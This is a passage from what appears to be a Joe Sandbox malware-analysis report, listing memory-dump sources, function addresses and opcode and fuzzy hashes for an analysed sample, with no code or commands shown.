                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 37dcff668a13ac7664a65d074101e8d45831704a40427edf5dff100c5f881fab
                                                              • Instruction ID: 6bbd0e82836daf3a08b79673ecdc5ca19951ebbe2de9b94d89cea05383d08447
                                                              • Opcode Fuzzy Hash: 37dcff668a13ac7664a65d074101e8d45831704a40427edf5dff100c5f881fab
                                                              • Instruction Fuzzy Hash: B312B676F483154FC30CED6DC992359FAD767C8310F1A893EA95ADB3A0E9B9EC014681
                                                              Function 003FCBB0 Relevance: .4, Instructions: 408COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a9ed142efbc3535bb558a8292013c1190d924a8c5fbda9f973594f51d174ed75
                                                              • Instruction ID: bf5e4803f800d1216db848e5db57cd828e7997dd575c968c8786113a19135211
                                                              • Opcode Fuzzy Hash: a9ed142efbc3535bb558a8292013c1190d924a8c5fbda9f973594f51d174ed75
                                                              • Instruction Fuzzy Hash: C5E1563095C31D8FD322CF09C54433ABBE2BB86350F25852DE69A8B395D778DD469B82
                                                              Function 00742F90 Relevance: .3, Instructions: 313COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 72a2da86a39d650c682cc04dc614ae1369d45e25439c15332c6e890b86120e3d
                                                              • Instruction ID: 781d106259bf956257d085172b4ce8e62e53fe20c5dd367a1f5a6c69b3d18f4b
                                                              • Opcode Fuzzy Hash: 72a2da86a39d650c682cc04dc614ae1369d45e25439c15332c6e890b86120e3d
                                                              • Instruction Fuzzy Hash: BDC159B16056018BD328DF19C490269FBE1FF91310F29866DD5AE8F792DB38E985CB80
                                                              Function 004C0420 Relevance: .3, Instructions: 289COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 49e37e3fb03f93da9d9d649f0b3f10027f9cefc4c25519c2e446c373813ed613
                                                              • Instruction ID: 0f850c01197cc529f671d6522463f533ef78ce2bac9fcc6c525fd42b6b94ff0e
                                                              • Opcode Fuzzy Hash: 49e37e3fb03f93da9d9d649f0b3f10027f9cefc4c25519c2e446c373813ed613
                                                              • Instruction Fuzzy Hash: 4DA116757083118FC758CF2CC480B2BB7E6AFC6310F59862EE59597391E638DC468B8A
                                                              Function 004BC770 Relevance: .3, Instructions: 270COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 683224067c027944c6ca69fdbb718edbc9ffe4db7d7567d4de4577e7526fedca
                                                              • Instruction ID: 750e18befe729ba41cd2ef3fc77cae6c0d01cbaeb71d3bcea8d498a6dcaecd51
                                                              • Opcode Fuzzy Hash: 683224067c027944c6ca69fdbb718edbc9ffe4db7d7567d4de4577e7526fedca
                                                              • Instruction Fuzzy Hash: 4FA19231A001598FEB38DE29CCC5FDA73A2EBCD310F0A8525EC599F391EA34AD458795
                                                              Function 004BC320 Relevance: .3, Instructions: 253COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4119c6def6842a138ba71f0cb8e736636a22bb00ce861d21a8acd0234f799ab4
                                                              • Instruction ID: ca6cc78b2566e7161a8114ccd3243df0e4a7f51ca0df0f168d4af31cb63ff9f4
                                                              • Opcode Fuzzy Hash: 4119c6def6842a138ba71f0cb8e736636a22bb00ce861d21a8acd0234f799ab4
                                                              • Instruction Fuzzy Hash: B6C10571914B419BD722CF38C881BEBB7E1BFD9300F109A1EE8EA96241EB747584CB55
                                                              Function 00774D40 Relevance: .3, Instructions: 253COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 38ffbaef0808b7c675210d4aa3a862a75a100d7947326ec701e402bd6150a698
                                                              • Instruction ID: 20bfc623900b952010d91ad342e8a80f6d0bdce3003dce303be361b1be1288e7
                                                              • Opcode Fuzzy Hash: 38ffbaef0808b7c675210d4aa3a862a75a100d7947326ec701e402bd6150a698
                                                              • Instruction Fuzzy Hash: 947118223086644ADF254A3C489027AA7D79BC63A0F9DC63AE4ED87385D77D9C42D391
                                                              Function 005C6AC0 Relevance: .2, Instructions: 222COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7f415174423c2eba9b1772a2c556d749ffce1cfa97bf4f30baa5cb53c867a0c1
                                                              • Instruction ID: 1bb130e4c9b8817bf71c74f22cc1f003a34943390f69b052ed878e97c90056b5
                                                              • Opcode Fuzzy Hash: 7f415174423c2eba9b1772a2c556d749ffce1cfa97bf4f30baa5cb53c867a0c1
                                                              • Instruction Fuzzy Hash: 2881C461D0D7859BD6219B358A41BFBB7E4BFE9308F059B2CAD8C51113FB30BAD48202
                                                              Function 00749920 Relevance: .2, Instructions: 210COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a573cecea62be61f8f35d72f54d2c7a3921fa6da37ffda8655727008e155ff29
                                                              • Instruction ID: 683f76af7733f41a2fc697772559c56493aa1f23a3f4e7e7c8fe17654747803e
                                                              • Opcode Fuzzy Hash: a573cecea62be61f8f35d72f54d2c7a3921fa6da37ffda8655727008e155ff29
                                                              • Instruction Fuzzy Hash: AA710772A08B15CBC7109F28D89072AB7E2EFD5324F19872DD9A847391D339ED51CB81
                                                              Function 0075D430 Relevance: .2, Instructions: 205COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e7403b3f1b05e27c08fbf144da2b7fdd7302dfed4d591b270009ef6b3ccddfc6
                                                              • Instruction ID: 569b023319cb1e363aa2e3cde29fec9316f4b839703a60d614a5751163ef53cf
                                                              • Opcode Fuzzy Hash: e7403b3f1b05e27c08fbf144da2b7fdd7302dfed4d591b270009ef6b3ccddfc6
                                                              • Instruction Fuzzy Hash: 1E81E872D14B828BD3349F28C8806B6B7A0FFDA315F144B5EECD606682E7B89985C741
                                                              Function 00756730 Relevance: .2, Instructions: 204COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 70da776b008e4ac5ca9fd41b0f68c7b73c5faf1538f30bdfcefcdc8b4c829413
                                                              • Instruction ID: ad4628083d9b00038b2ad2b7f571c3b60452a66e4454c9b3105287933654053c
                                                              • Opcode Fuzzy Hash: 70da776b008e4ac5ca9fd41b0f68c7b73c5faf1538f30bdfcefcdc8b4c829413
                                                              • Instruction Fuzzy Hash: C281D572D14B828BD3149F64C8806B6B7A0FFDA314F549B1EECE607642E7B8A585C780
                                                              Function 007635B0 Relevance: .2, Instructions: 203COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
